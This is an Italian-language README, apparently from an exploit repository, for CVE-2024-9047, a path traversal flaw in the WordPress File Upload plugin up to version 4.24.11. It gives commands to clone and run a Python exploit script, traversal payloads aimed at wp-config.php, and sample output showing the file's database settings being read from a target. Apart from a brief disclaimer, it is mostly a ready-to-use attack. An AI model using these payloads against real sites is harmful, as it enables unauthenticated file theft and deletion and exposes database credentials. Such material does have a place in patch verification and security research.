
Exploit per WordPress File Upload Plugin - Tutte le versioni fino alla 4.24.11 sono vulnerabili.
Il plugin WordPress File Upload per WordPress è vulnerabile a una vulnerabilità di Path Traversal in tutte le versioni fino alla 4.24.11 inclusa, tramite il file wfu_file_downloader.php. Questa vulnerabilità consente a un attaccante non autenticato di leggere o eliminare file al di fuori della directory prevista. Lo sfruttamento riuscito richiede che l'installazione di WordPress target esegua PHP 7.4 o precedente.
Un attaccante può sfruttare questa vulnerabilità creando una richiesta specifica all'endpoint vulnerabile, wfu_file_downloader.php, e manipolando il parametro del percorso del file per ottenere accesso non autorizzato a file sensibili sul server.
4.24.11 o precedente).7.4 o precedente.Clona questo repository:
git clone https://github.com/Nxploited/CVE-2024-9047-Exploit.git
cd CVE-2024-9047-Exploit
Installa le dipendenze Python (se necessario):
pip install requests
Esegui lo script per controllare la versione del plugin e sfruttare la vulnerabilità:
python3 CVE-2024-9047.py --url http://target-site.com --command /../../../../../path/to/target/file
Per sfruttare la configurazione vulnerabile predefinita e leggere il file di configurazione di WordPress:
python3 CVE-2024-9047.py --url http://192.168.1.100 --command /../../../../../opt/lampp/htdocs/wordpress/wp-config.php
C:\Users\Nxploit\Desktop\-C>python CVE-2024-9047.py -u http://192.168.100.74:888/wordpress/
Detected version: "trunk"
The site is vulnerable!
Exploit successful! Response:
<?php
// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress7' );
/** Database username */
define( 'DB_USER', 'root' );
/** Database password */
define( 'DB_PASSWORD', '' );
/** Database hostname */
define( 'DB_HOST', 'localhost' );
/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );
/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
/**#@+
Per proteggere il tuo sito WordPress:
Questo codice è destinato esclusivamente a scopi educativi e di ricerca. L'uso non autorizzato di questo script su sistemi di cui non si possiede la proprietà o per i quali non si ha esplicita autorizzazione è illegale e non etico. Gli autori declinano ogni responsabilità per qualsiasi uso improprio di questo codice.